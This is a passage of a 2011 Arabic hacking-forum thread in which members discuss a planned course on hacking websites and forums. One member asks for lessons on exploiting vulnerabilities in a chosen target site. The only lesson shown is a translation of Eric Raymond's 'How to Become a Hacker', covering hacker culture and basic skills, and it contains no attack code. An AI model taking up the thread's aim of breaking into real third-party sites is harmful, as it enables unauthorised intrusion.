التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 03-16-2011, 05:15 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية despond
 

 

 
إحصائية العضو







despond غير متواجد حالياً

إرسال رسالة عبر MSN إلى despond

 

 

إحصائية الترشيح

عدد النقاط : 10
despond is on a distinguished road

6 الى متى ((ادعسلي _فجرلي _اخترقلي ))


:glasses:السلام عليكم ورحمة الله وبركاته

كيفيك يا غالين نشالله تكونو بخير

اليوم بدي منكون تفتحولي مخكون مظبوط طبعا هادا الموضوع للمبتدأين وللمحترفين ولل متوسطين في اختراق المواقع والمنتديات

طيب خلونا نبلش مبدئيا بمقدمة الموضوع
نحن شبكة العناكب الأحترافية يعني نحن احترافية يعني ما بدي من يوم ورايح ولا عضو بقسم اختراق المواقع والمنتديات يون مبدتا نحن شو (( محترفين )) يعني كلشي ناقصو شي يقلي بس اوك

المقدمة :
الى كل من يحتاج شيئا في هاذا المنتدى الغالي وفي هاذا القسم الفريد من نوه كفعاليات وكاعضاء
وانا كل من يمر على هاذا الموضوع سأعتبر اني وضعت اسه وساما على صدري \

-------------------------
طيب خلصنا مقدمة

هلأ انا الي عندكون طلب \

وهو : انا معد بدي اشوف اي كلمة من هدول الكلمات ان كان :
ادعسلي
\فجرلي
سويلي

علمني : هي الكلمة يلي انا بدي ياها طبعا ما عيب انو الأنسان يتعلم من غيرو وهادا شي اكيد

طيب بظن انو يلي ما بدو ينفز طلبي ما بدي ردو بهل مشاركة لأنو منتدى العناكب الحترافية

منتدى غالي على قلوبنا وبدنا يا غير كل المنتديات العربية
بدنا يا يكون مرتب ومنظم واهم شي بدون تلغيم لانو الملغم بالشبكةا لعنمكبوتية :slap: رح يكون مدفون بمقبرتي

المهم ما علينا الغاي من الموضوع
1: يلي ناقصو شي يقلي علي انا علمو
كمثال : ابي اتعلم الأختراق للمنتديات
او ابي اتعلم اختراق المواقع \

او ابي ثغرات اوك مو مشكلة :lol:

الحين الغاية التانية
2: نخلي المنتدى مرتب وطرض كل الملغمين وان نجعله المنتدى الفريد من نوعه

يعني خلاصة الكلام بدي المنتدى يكون احلا منتدى ونعتبرو متل منتدانا

اوك يله انا بانظار ةردودكم وطلباتقم \


واهم شي التقيم :lol:



hgn ljn ((h]usgd _t[vgd _hojvrgd ))

التوقيع

لا تحوال التلغيم فأن لغمت سوف يتم دعسك ونسيانك مع التاريخ
:love: شبكةالعناكب الأحترافية :love:
للتواصل + تبادل الخبرات + التعليم
كود:
sy7@live.de

الحمد لله على اني مسلم ولو لم اكن مسلم لأسلمت وقلت
لا اله الا الله وحده لا شريك له واشهد ان محمد عبده ورسوله

 

   

رد مع اقتباس
قديم 03-16-2011, 05:33 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
anti-trust
Your Worst Enemy
 
الصورة الرمزية anti-trust
 

 

 
إحصائية العضو






anti-trust غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
anti-trust is on a distinguished road

افتراضي


اقتباس
نحن شبكة العناكب الأحترافية يعني نحن احترافية يعني ما بدي من يوم ورايح ولا عضو بقسم اختراق المواقع والمنتديات يون مبدتا نحن شو ((

اقتباس
محترفين )) يعني كلشي ناقصو شي يقلي بس اوك




نايس

اقتباس
وهو : انا معد بدي اشوف اي كلمة من هدول الكلمات ان كان :

اقتباس
ادعسلي
\فجرلي
سويلي



Awesome

اقتباس
بدنا يا يكون مرتب ومنظم واهم شي بدون تلغيم لانو الملغم بالشبكةا لعنمكبوتية :slap: رح يكون مدفون بمقبرتي

lol

اقتباس
يعني خلاصة الكلام بدي المنتدى يكون احلا منتدى ونعتبرو متل منتدانا


كلام جميل


اوكي بس شو الموضوع بالضبط ؟؟

   

رد مع اقتباس
قديم 03-16-2011, 05:40 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية inox team
 

 

 
إحصائية العضو







inox team غير متواجد حالياً

إرسال رسالة عبر MSN إلى inox team إرسال رسالة عبر Skype إلى inox team

 

 

إحصائية الترشيح

عدد النقاط : 10
inox team is on a distinguished road

افتراضي


اكيد شو في’

   

رد مع اقتباس
قديم 03-16-2011, 05:49 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية PeNOOFyO
 

 

 
إحصائية العضو






PeNOOFyO غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
PeNOOFyO is on a distinguished road

افتراضي


Thanx bro ^^

   

رد مع اقتباس
قديم 03-16-2011, 05:53 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية despond
 

 

 
إحصائية العضو







despond غير متواجد حالياً

إرسال رسالة عبر MSN إلى despond

 

 

إحصائية الترشيح

عدد النقاط : 10
despond is on a distinguished road

افتراضي


الموضوع وما فيه اخواتي يعتبر دورة عامة عن اختراق المواقع والمنتديات يعني يلي حابب يطلب اي طلب او يستفسر اي استفسار بالنسبة لأختراق المواقع والمنتديات انا ما عندي مشكلة رح كون متواجد لجوابه

ومشكور على مروركم وهاذا وسام شرف على صدري

التوقيع

لا تحوال التلغيم فأن لغمت سوف يتم دعسك ونسيانك مع التاريخ
:love: شبكةالعناكب الأحترافية :love:
للتواصل + تبادل الخبرات + التعليم
كود:
sy7@live.de

الحمد لله على اني مسلم ولو لم اكن مسلم لأسلمت وقلت
لا اله الا الله وحده لا شريك له واشهد ان محمد عبده ورسوله

 

   

رد مع اقتباس
قديم 03-16-2011, 05:59 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية inox team
 

 

 
إحصائية العضو







inox team غير متواجد حالياً

إرسال رسالة عبر MSN إلى inox team إرسال رسالة عبر Skype إلى inox team

 

 

إحصائية الترشيح

عدد النقاط : 10
inox team is on a distinguished road

افتراضي


thanks you man

   

رد مع اقتباس
قديم 03-16-2011, 08:26 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية khiero
 

 

 
إحصائية العضو





khiero غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
khiero is on a distinguished road

افتراضي


اشكر اخي على المبادرة الحلوة
اولا بدنا دروس متسلسلة حول
تعيلم كيف نستغل و نطبق
الثغرات و بمختلف انواعها اللي كل يوم نشوفها تنزل في مواقع السكيوريتي وبانواعها
ثانيا
بدنا دروش كيف نستخرج الثغرة بانفسنا و من الموقع المستهدف يعني مش اي موقع عشوائي

   

رد مع اقتباس
قديم 03-16-2011, 09:06 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
ViRuS Qalaa
iraQi HackerS
 
الصورة الرمزية ViRuS Qalaa
 

 

 
إحصائية العضو







ViRuS Qalaa غير متواجد حالياً

إرسال رسالة عبر MSN إلى ViRuS Qalaa

 

 

إحصائية الترشيح

عدد النقاط : 10
ViRuS Qalaa is on a distinguished road

افتراضي


مشكور ياغالي على هذا الموضوع الرائع ..
الفكرة جميلة جدا , ماشاء الله عليك ..)


نشوف الردود والمتابعة من حضرتك مشان اذا حصل الموضوع على ردود وشعبية ونشوف التواصل سوف يتم التثبيت بأذن الله

بلتوفيق ,,,,
التوقيع

12 My Twelve Imams


Good Bye VbSpiders
I'll Back
Si
gn Out

 

   

رد مع اقتباس
قديم 03-16-2011, 09:11 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية k4$p3r-MA
 

 

 
إحصائية العضو








k4$p3r-MA غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
k4$p3r-MA is on a distinguished road

افتراضي


اشكر اخي على المبادرة الحلوة
التوقيع

http://www.cafe-hbal.com/up/uploads/13369618701.gif

دعواتكم معنا بالنجاح و لجميع المسلمين
Yes I we will bE BaCk 2013

 

   

رد مع اقتباس
قديم 03-18-2011, 05:08 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية despond
 

 

 
إحصائية العضو







despond غير متواجد حالياً

إرسال رسالة عبر MSN إلى despond

 

 

إحصائية الترشيح

عدد النقاط : 10
despond is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة khiero
اشكر اخي على المبادرة الحلوة
اولا بدنا دروس متسلسلة حول
تعيلم كيف نستغل و نطبق
الثغرات و بمختلف انواعها اللي كل يوم نشوفها تنزل في مواقع السكيوريتي وبانواعها
ثانيا
بدنا دروش كيف نستخرج الثغرة بانفسنا و من الموقع المستهدف يعني مش اي موقع عشوائي

تكرم عيناك يا غالي ومن عيوني وانا سوف اطرح موووووووضوع كامل بأزن الله عن اختراق المواقع بشكل عام وليس فقط عن الثغرات واستغلالها
:coool:
التوقيع

لا تحوال التلغيم فأن لغمت سوف يتم دعسك ونسيانك مع التاريخ
:love: شبكةالعناكب الأحترافية :love:
للتواصل + تبادل الخبرات + التعليم
كود:
sy7@live.de

الحمد لله على اني مسلم ولو لم اكن مسلم لأسلمت وقلت
لا اله الا الله وحده لا شريك له واشهد ان محمد عبده ورسوله

 

   

رد مع اقتباس
قديم 03-18-2011, 05:10 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية despond
 

 

 
إحصائية العضو







despond غير متواجد حالياً

إرسال رسالة عبر MSN إلى despond

 

 

إحصائية الترشيح

عدد النقاط : 10
despond is on a distinguished road

افتراضي


أولا أنا سأتحدث عن سلسلة فى التعلم اختراق المواقع من البداية الى الاحتراف

أرجو من المشرفين تثبيت الموضوع والمواضيع القادمة فهو بإذن الله سيكون بمسابة مرجع لكل الاخوة

" الدرس الأول "

أولا قبل البدء فى شرح الدرس أحب أن أوجه عنايتكم الى معنى كلمة هاكر

أنا كنت أحاول كتابة تعربف ولكنى لم أجد أفضل من التعريف الذى قرأته للمبرمج الانجليزى والذى أنا من أشد المعجبين به إيريك ستيفين ريموند حيث قال فى تعريفه :

يوجد العديد من التعريفات للمصطلح "هاكر"، معظمها يصف خبرة تقنية و سعاده بحل المشكلات و تخطي الحدود. إذا كنت تريد أن تعرف كيف تصبح هاكر هناك تعريفين فقط يجب أن تعرفهما.

يوجد مجتمع، حضارة مشتركة من المبرمجين المحترفين و خبراء الشبكات بدأت منذ عقود من الزمن منذ ظهور الحواسيب الصغيرة و تجارب ARPAnet المبكرة. أوجد الأشخاص المنتمين لهذا المجتمع المصطلح "هاكر"، الهاكرز هم من بنوا الإنترنت، الهاكرز هم من جعلوا نظام التشغيل يونكس ما هو عليه اليوم، الهاكرز هم من جعلوا الورلد وايد ويب تعمل، إذا كنت منتميا لهذه الحضارة، إذا كنت قد ساهمت بها و يوجد أشخاص آخرون منتمون لها و يعرفونك و يطلقون عليك لقب هاكر إذا فأنت هاكر.

عقلية الهاكر ليست مقتصرة على حضارة هاكرز البرمجيات فقط. يوجد أشخاص لديهم نفس العقلية و نفس طريقة التفكير في مجالات أخرى مثل الموسيقى و الإلكترونيات. في الحقيقه قد تجد هذه العقلية في أعلى مستويات أي علم أو فن. هاكرز البرمجيات يتعرفون على هذه العقليات في أي مجال آخر و يطلقون على هؤلاء الأشخاص هاكرز أيضاً. و يقول البعض الآخر أن عقلية الهاكر منفصله عن الوسط الذي يعمل به و لكن في بقية هذا المقال سوف نتحدث عن المهارات و الصفات الأساسية لدى هاكر البرمجيات و التقاليد المتعارف عليها في تلك الحضارة التي أطلقت كلمة "هاكر".

يوجد مجموعة أخرى من الأشخاص يطلقون على أنفسهم لقب هاكرز بكل وقاحة و لكنهم ليسوا كذلك. هؤلاء هم من يشعرون بالسعاده عند إختراق بعض نظم الحاسب أو التصنت على خطوط الهاتف. الهاكرز الحقيقيون يسمون هؤلاء "كراكرز" ولا يودون أن يكون لهم أية علاقه بهم. الهاكرز الحقيقيون يظنون أن الكراكرز غير جديرون بتحمل المسئولية و كسولين و ليسوا على قدرة كبيرة من الخبره. لا تجعلك القدرة على اختراق نظام ما هاكر فإذا استطاع شخص ما سرقة سيارة ما بدون استخدام مفتاحها هل يجعله ذلك مهندس ميكا***ا؟!. للأسف قام بعض الكتاب و الصحفيين باستخدام كلمة "هاكر" ليصفوا الكراكرز و هذا التصرف يسبب الإزعاج الشديد للهاكرز.

الفرق بسيط و واضح: الهاكرز يقومون بالبناء، الكراكرز يقومون بالهدم.

إذا كنت تريد أن تصبح هاكر فاستمر بالقراءة. إذا كنت تريد أن تصبح كراكر فاذهب و قم بقراءة أخبار alt.2600 و استعد لقضاء ما بين خمس لعشر سنوات في السجون بعدما تكتشف أنك لست ذكيا كما كنت متصورا. و هذا هو كل ما سأقوله عن الكراكرز.
ثقافة الهاكر
يقوم الهاكرز بحل المشاكل و بناء الأشياء. و يؤمنون بالحرية و بالعمل التطوعي. لكي تعرف كهاكر يجب أن تتصرف بهذا المنطق. و لكي تتصرف بهذا المنطق يجب أن تؤمن بهذا المنطق. و لكن إذا ادعيت الإيمان بهذه المبادئ لكي تكتسب القبول في هذا المجتمع فسوف تفقد الهدف الأساسي. إيمانك بهذه المبادئ مهم بالنسبة إليك فسوف يساعدك و يدفعك إلى التعلم. مثل كل الفنون الإبداعية أفضل الطرق لتصبح المعلم هو أن تفكر بعقل المعلم ليس فقط فكريا و انما عاطفيا أيضاً.

أو كما تقول القصيدة:

To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.
و معناها: راقب المعلم، اتبع المعلم، امشي مع المعلم، انظر عبر المعلم، كن المعلم.

لذا إذا أردت أن تصبح هاكر ردد هذه الكلمات حتى تؤمن بها.

1- العالم مليئ بالمشاكل التي تنتظر الحل

كونك هاكر سيصبح مصدر للمرح و لكنه مرح يحتاج لمجهود شاق. هذا المجهود يحتاج إلى دافع، يحصل الرياضيون على الدافع من نوع السعاده عند جعل أجسادهم في حالة أفضل، في تخطي حدود طاقتهم الجسدية. بالمثل، لتصبح هاكريجب أن تحصل على السعادة من حل المشكلات، تطوير مهاراتك، و تدريب و استعمال ذكائك.

إن لم تكن من هذا النوع من الأشخاص بطبيعتك فسوف تحتاج أن تصبح واحدا منهم لكي تنجح كهاكر. و إلا سوف تجد أن قدراتك مهدرة على مصادر الإلهاء الأخرى.

يجب أيضا أن يكون لديك إيمان بقدرتك على التعلم. إيمان بأنك حتى لو لم تكن على علم بكيفية حل المشكله ككل فسوف تتعلم أول جزء من الحل و هذا سيوصلك للجزء التالي ثم إلى الجزء الذي يليه حتى تقوم بحل المشكله كلها.

2- لا يجب أن تحل مشكلة ما أكثر من مره

العقول المبدعة عملة نادره لا يجب أن تهدر على إعادة اختراع العجله بينما يوجد العديد من المشاكل الجديده التي تنتظر منك حلها.

لكي تتصرف مثل الهاكرز يجب أن تؤمن بأن الوقت الذي يضيعه الهاكرز في التفكير هو وقت غالي لدرجة أنه من واجبك أن تشارك المعلومات و أن تقوم بحل المشكلات و من ثم أن تشارك الحل مع الجميع ليتمكن الهاكرز الآخرون من حل مشاكل جديده بدلا من الإضطرار لإعادة حل مشكلات قديمة.

لا يجب أن تؤمن بأنه عليك التبرع بكل إبداعك الفكري بالرغم من أن الهاكرز الذين يفعلون هذا يحصلون على أكبر قدر من الاحترام من الهاكرز الآخرين. من ضمن فكر الهاكرز أنه عليك أن تقوم ببيع جزء و لو بسيط من انتاجك لتحافظ على مستواك المعيشي. من العادي أن تستغل قدراتك كهاكر لتنشئ عائلة أو لتصبح غنيا طالما لم تنسى ولائك لفنك و لزملائك من الهاكرز.

3- الملل و العمل الشاق سيئين

لا يجب أن يشعر الهاكرز (و المبدعين عموما) بالملل أو أن يقوموا بعمل تكراري غبي و شاق. ففي هذه الحاله إنهم لا يقومون بما يستطيعون عمله و هو حل مشاكل جديده. هذا التضييع للوقت مضر للجميع. لذلك فالعمل الممل ليس سيئ فحسب بل هو سيئ للغاية.

لتتصرف كهاكر يجب أن تؤمن بهذا كفاية حتى تحاول دائما أن تقوم بإخراج هذا النوع من العمل من حياتك بقدر المستطاع، ليس لك فحسب و لكن لكل الآخرين و خصوصا الهاكرز.

يوجد استثناء واحد لهذا و هو أن يقوم الهاكرز في بعض الأحيان بعمل بعض هذه الأعمال كنوع من تصفية الذهن أو لتعلم شئ جديد لا يمكن تعلمه إلا بهذه الطريقة. و لكن هذا الشئ يكون باختيار الهاكر دائما. لا يوجد شخص عاقل قد يمكن دفعه إلى موقف يصيبه بالملل.

4- الحرية جيدة

الهاكرز بطبيعتهم رافضين للسلطة عليهم. أيا كان من لديه القدرة على إعطائك الأوامر يمكنه منعك من حل مشكلة قد تجد أنت في حلها متعه. و بالنظر للعقلية المحبة للسلطة، فسوف يجد دوما تفسير أبله لمنعك. لذلك يجب دوما محاربة التسلط أينما وجدته خشية أن يؤثر عليك و على الهاكرز الآخرين.

ليس هذا مثل محاربة كل السلطات. الأطفال بحاجه إلى التأديب و المجرمين بحاجه إلى العقاب. يمكن أن يوافق الهاكر على بعض أنواع السلطة عليه لكي يستطيع الحصول على شئ يريده. و لكن هذا ليس أكثر من نوع من المقايضة أما نوع الاستسلام الذي يريده الفاشيستيين ليس مسموح به.

يحب الفاشيستيين الرقابه و السرية و لا يثقون في التعاون التطوعي و مشاركة المعلومات، نوع التعاون الذي يحبونه هو التعاون الذي يستطيعون التحكم به. لذلك لكي تصبح هاكر يجب أن يكون لديك رفض للرقابه و السريه و يجب أن يكون لديك الاستعداد للتصرف بناء على هذا الإعتقاد.

5- المظهر لا يغني عن القدرات

لكي تصبح هاكر يجب أن يكون لديك هذه الثقافه التي تحدثنا عنها و لكن ليس وحدها. هذه الثقافه لن تغ*** عن القدرات التي يجب أن تتوفر لدى الهاكر. لكي تصبح هاكر سوف يتطلب منك هذا ذكاء و مجهود و تفاني و عمل شاق. لذلك يجب أن تتعلم أن لا تثق بالمظاهر و أن تحترم كل أنواع القدرات. لن يدع الهاكرز المستعرضين يضيعون وقتهم و لكنهم يحترمون القدرات و بالذات القدرات في الهاك. و لكن القدرات في أي مجال جيده. القدرة في طلب المهارات التي لا يستطيع الحصول عليها الا القليلين، المهارات التي تتطلب حدة عقلية و الحرفية.

إذا كنت تحب أن يكون لديك قدرات فسوف تستمع بتطويرها فيك، سيصبح العمل الشاق نوع من اللعب و المتعه لديك. هذا الصفة ضرورية لتصبح هاكر.
عفوا على بعض الأخطاء فى الترجمة


أحب أن أوجه عنايتكم الى مهارات الهكر

عفوا اخوانى على طول الموضوع ولكن يجب توضيح النقاط المهمة للهاكر قبل البدء فى التطبيق وأعدكم بأن باقى المواضيع لن تستغرق كل هذا الطول بل ستكون أكثر متعة وتشويق !!!

الان نتحدث عن مهارات الهاكر

مهارات الهاكر الأساسية

1- تعلم البرمجه
2- احصل على أحد أنظمة يونكس مفتوحة المصدر و تعلم كيفية تشغيله و استخدامه
3- تعلم كيفية استعمال الورلد وايد ويب و كيفية كتابة HTML
4- إذا لم تكن تعرف الإنجليزية، إبدأ في تعلمها

طريقة تفكير الهاكر مطلوبة و لكنها لا تغني عن المهارات الأساسية التي يجب أن تتوفر لديه قبل أن يستطيع أي شخص أن يلقبه بلقب هاكر.

هذه المهارات تتغير ببطئ عما قبل مع مرور الزمن و مع خلق التكنولوجيا لمهارات جديده. فمثلا كانت هذه المهارات من قبل تتضمن تعلم لغة الآلة و مؤخرا تضمنت كتابة HTML. بالنسبة للوقت الحالي فهذه المهارات تتضمن التالي:

1- تعلم البرمجه

هذه بالتأكيد هي المهارة الأساسية لدى الهاكر. إذا لم تكن تعلم أي من لغات الحاسب الآلي أنصحك بالبدأ بتعلم لغة python. يوجد وثائق تعليمية جيده لها و سهلة للمبتدئين. و بالرغم من كونها لغة جيده للبدأ بها فهي ليست لعبة بل انها لغة قوية و مناسبة للمشاريع الكبيرة. لقد قمت بكتابة تقييم أكثر تفصيلا عن البايثون تجده هنا. و يوجد دروس تعليمية جيده على موقع بايثون الرسمي.

الجافا لغة برمجة جيده أخرى. هي أصعب من البايثون و لكنها تنتج كود أسرع من البايثون. برأي انها تمثل أفضل اختيار ثاني لك. لأسف فالتطبيق المرجع الخاص بشركة صن مازال غير حر. و لكن ليست هذه المشكلة في لغة الجافا نفسها حيث يوجد مترجمين عاليي الجودة و مفتوحين المصدر للجافا. المشكلة الحقيقية تكمن في المكتبات التي تأتي مع لغة البرمجة. المكتبات مفتوحة المصدر أقل جودة من الخاصه بشركة صن. لذلك فإذا اخترت تعلم الجافا قم بالتعلم بواسطة أحد التطبيقات مفتوحة المصدر بدلا من الاعتماد على تطبيق صن المغلق المصدر.

لكن احذر، لن تصل إلى مستوى الهاكر أو حتى المبرمج إذا تعرفت على لغة برمجة واحده أو اتنتين. يجب أن تتعلم كيفية التفكير في المشاكل البرمجية بشكل عام. مستقلا عن أية لغة برمجة. لكي تصبح هاكر يجب أن تصل إلى مستوي حيث يمكنك تعلم لغة برمجة في أيام عن طريق ربط ما هو موجود في كتيب هذه اللغه بما تعرفه انت مسبقا. و هذا يعني تعلمك للعديد من لغات البرمجة.

اذا بدأت في التعمق في برمجة جدية فسوف يجب عليك تعلم لغة السي، قلب نظام التشغيل يونكس. لغة السي++ قريبه جدا من لغة السي، إذا تعلمت واحده فسوف يصبح من السهل عليك تعلم الأخرى. ليست أي منهما الاختيار الصحيح لكي تبدأ به. في الحقيقة كلما استطعت الابتعاد عن البرمجة بالسي كلما أصبحت أكثر انتاجية.

السي لغة قوية و موفرة لمصادر جهازك ولكن لكي توفر السي هذه الميزة يتوجب عليك عمل العديد من الوظائف بنفسك للتحكم في المصادر ( كالذاكرة مثلا). كل هذه الشيفرة البرمجية تزيد من احتمالات الخطأ و سوف تتطلب منك وقت أطول في تتبع الأخطاء بالبرنامج. هذه الميزة ليست في غاية الأهمية هذه الأيام مع وجود أجهزة قوية كالموجودة حاليا. يفضل استخدام لغة برمجة تقوم بإهدار مصادر الجهاز و لكنها ستقوم بتوفير وقتك مثل البايثون.

يوجد لغات أخرى تعتبر مهمة للهاكرز من ضمنها البيرل و ليسب. البيرل مهمة لأسباب عملية، فهي تستخدم للصفحات الديناميكية و يستخدمها مديرين النظم. لذلك حتى لو لم تتعلم البرمجة بلغة بيرل فعليك أن تستطيع فهم الكود المكتوب بها. يستخدم العديد من المبرمجين البيرل بنفس الصورة التي أقترح عليك استخدام البايثون بها لتجنب البرمجة بالسي عندما لا تحتاج إلى هذا القدر من التحكم في مصادر الجهاز. سوف تحتاج أن تفهم الكود الذي يكتبه هؤلاء المبرمجين.

تستحق لغة ليسب لفت الانتباه لها لسبب مختلف، بسبب التجربة الرائعة التي سوف تحظى بها عندما تصل إلى فهم هذه اللغه. هذه الخبرة سوف تجعلك مبرمج أفضل لباقية حياتك حتى لو لم تستخدم هذه اللغه كثيرا. يمكنك اكتساب خبرة بسيطه ببساطه عن طريق كتابة أو تعديل بعض الأنماط لمحرر النصوص emacs.

أفضل اختيا بالطبع أن تتعلم الخمس لغات. البايثون، السي، السي++، الجافا، البيرل، و الليسب. إلى جانب أنهم أهم اللغات للهاكرز فهم يمثلون تعريف بأكثر من تقنية برمجية و كل منهم سوف يعلمك شئ ذو قيمة عاليه.

لا يمكنني شرح كيفية تعلم البرمجة في هذا المقال فهي مهارة معقدة. و لكن يمكنني أن أخبرك بأن الكتب و الدورات لن يؤدوا الغرض. الكثير بل معظم الهاكرز علموا أنفسهم بأنفسهم. يمكنك تعلم شيئ بسيط من الكتب و لكن أهم المهارات سوف تتعلمها فقط عندما تبدأ بممارسة البرمجة. ما سوف يعلمك بالشكل الصحيح هو 1- قراءة الكود البرمجي 2- كتابة الكود البرمجي.

تعلم البرمجة يكاد يكون مثل تعلم أي لغه بشريه حيث أفضل طريقة لتعلم اللغات البشريه هي قراءة بعض ما هو مكتوب من قبل أساتذة تلك اللغات و كتابة بعض الأشياء بنفسك و قراءة المزيد و كتابة المزيد حتى تبدأ كتاباتك في التطور لتصل إلى المستوى الذي تريده.

كان العثور على كود لبرامج جيده صعبا بسبب وجود عدد بسيط من البرامج حرة المصدر ليتمكن الهاكرز من قرائتها و التعديل بها و لكن هذا الشئ قد تغير تماما الآن فالبرامج و نظم التشغيل و أدوات البرمجة مفتوحة المصدر و المبنية من قبل الهاكرز متوفرة الآن و هذا ما ينقلني للنقطة التالية

2- احصل على أحد أنظمة يونكس مفتوحة المصدر و تعلم كيفية تشغيله و استخدامه

سأفترض أن لديك جهاز كمبيوتر أو تستطيع الوصول لجهاز. أهم خطوة يمكن لمبتدئ أخذها للحصول على مهارات الهاكر هي أن يقوم بالحصول على نسخة من نظام التشغيل لينكس أو نظام التشغيل من عائلة BSD و يقوم بتثبيته على جهازه و العمل به.

نعم يوجد أنظمة تشغيل أخرى و لكنها أنظمة مغلقة المصدر و تصل إليك في الشكل النهائي حيث لا يمكنك قراءة الكود المصدري للنظام ولا يمكنك التعديل به. محاولة تعلم الهاك أثناء استخدام نظام التشغيل وندوز أو ماك أو إس يشبه تماما من يحاول تعلم الرقص و هو يرتدي بذله حديدية.

يمكن التعلم باستخدام نظام MacOS X و لكن ليس كل نظام التشغيل مفتوح المصدرللك فسوف تقابل العديد من العقبات. و كن حذا لكي لا يصبح لديك العادة السيئة و هي الاعتماد على الكود مغلق المصدر الخاص بشركة أبل. إذا ركزت على مبادئ اليونكس الموجوده في النظام فسوف تتعلم شسئا مفيداً.

اليونكس هو نظام تشغيل الانترنت. بينما يمكنك تعلم استخدام الانترنت بدون تعلم اليونكس لن يمكنك أن تصبح هاكر انترنت بدون تعلم اليونكس و فهمه. لهذا السبب فثقافة الهاكرز الآن متمركزة بقوة حول اليونكس (لم يكن هذا موجودا من قبل و يوجد بعض الهاكرز القدامى الغير سعيدين بهذا الشئ و لكن الصلة بين اليونكس و الانترنت أصبحت قوية لدرجة أن حتى ميكروسوفت ليست بالقوة الكافية لتضعف هذه الصلة).

لذلك قم بجلب نظام تشغيل مثل اليونكس، أنا أفضل اللينكس و لكن يوجد أنظمة أخرى ( نعم يمكنك تثبيت نظامي لينكس و نظام وندوز على نفس الكمبيوتر جنبا إلى جنب). تعلم النظام و قم بالعمل عليه و ادخل على الانترنت عن طريقه. إقرأ الكود و عدل به. سوف تحصل على أدوات أفضل بكثير للبرمجة من أي أدوات يمكن أن تراها على نظام التشغيل وندوز. سوف تحصل على المرح و على الكثير من المعلومات أكثر مما تتخيل أثناء استخدامك و سوف تدرك هذا الشيئ عندما تنظر إلى الوراء لترى ما كنت عليه قبل أن تصبح هاكر.

للمزيد عن اليونكس راجع هذا المقال. يمكن أن تراجع أيضا كتاب The Art Of Unix Programming.

لكي تحصل على نسخة لينكس راجع موقع Linux Online!. يمكنك تحميل نسخة لينكس من هناك و لكن يستحسن أن تبحث عن مجموعة مستخدمي لينكس قريبه منك لتحصل منهم على النسخه و ليساعدوك على تثبيته على جهازك. بالنسبة للمستخدم الجديد فلا يوجد فرق كبير بين توزيعات اللينكس المختلفه.

يمكنك الحصول على المساعده بخصوص نسخ يونكس BSD من الموقع http://www.bsd.org/.

لقد قمت بكتابة درس عن مبادئ اليونكس و الانترنت.

ملاحظة: لا أنصح بتثبيت اللينكس أو BSD وحدهما على الجهاز إذا كنت مبتدئ. حاول العثور على مجموعة مستخدمي لينكس لتسألهم المساعده.

3- تعلم كيفية استعمال الورلد وايد ويب و كيفية كتابة HTML

معظم الأشياء التي يقوم بها الهاكرز ليست واضحه و مرئية لغير الهاكرز مثل مساعدة الجامعات و المصانع و المكاتب على العمل. ماعدا الويب، و هو لعبة الهاكرز البراقه التي حتى السياسيين يعترفون بأنهما تحدث تغييرا في العالم و لهذا السبب بالإضافة إلى أسباب لأخرى يجب أن تتعلم كيفية التعامل مع الويب.

لا يعني هذا أن تتعلم كيف تتعامل مع المتصفح ( أي شخص يمكنه فعل هذا) و لكن يجب أن تتعلم كيف تقوم بكتابة صفحات الانترنت بواسطة HTML. إذا لم تكن تعرف كيف تبرمج فعندما تتعلم كتابة الصفحات بواسطة HTML سوف تتعلم بعض العادات التي سوف تساعدك على تعلمالأشياء الأخرى. قم ببناء صفحة خاصه بك. حاول دائما أن تستخدم XHTML و هي أفضل من ال HTML التقليدية. يوجد العديد من الدروس التعليمية الجيده على الانترنت، هذا واحد منها http://www.make-a-web-site.com/

و لكن بناء صفحة على الانترنت لك ليس كافيا لتصبح هاكر. الويب مليئة بالصفحات الشخصية. معظمهم لا جدوى منهم ولا يوجد بهم أي محتوي ذو قيمة و ذو مظهر أبله. للمزيد عن هذا الموضوع راجع صفحة The HTML Hell Page

لكي يصبح لصفحتك قيمة يجب أن يكون بها محتوى يجذب الانتباه أو مفيد للهاكرز الآخرين. و هذا ينقلنا للنقطة التاليه.

4- إذا لم تكن تعرف الإنجليزية، إبدأ في تعلمها

بصفتي أمريكي و لغتي الأم هي الإنجليزية فقد كنت ممتنعا من ذكر هذه الجزئية خشية أن يعتقد البعض أنها إمبريالية حضارية. و لكن قام بعض المتحدثين بلغات أخرى بتحفيزي لذكر أن الانجليزية هي اللغة المعروفة كلغة أساسية لمجتمع الهاكرز و الانترنت و أنك سوف تحتاجها لكي تستطيع التعامل مع مجتمع الهاكرز.

في حوالي سنة 1991 علمت أن العديد من الهاكرزالذين يتحدثون لغات غير الانجليزي يستخدمون الانجليزية في مناقشاتهم التقنية حتى و لو كانت لغتهم الأم واحده. حيث أن اللغة الانجليزية بها مصطلحات تقنية أغنى من أي لغة أخرى و لهذا فهي أسهل في التخاطب في الأمور التقنية. و لذلك فالكتب المترجمة من الانجليزية إلى لغات أخرى ليست بنفس مستوى الكفاءة.

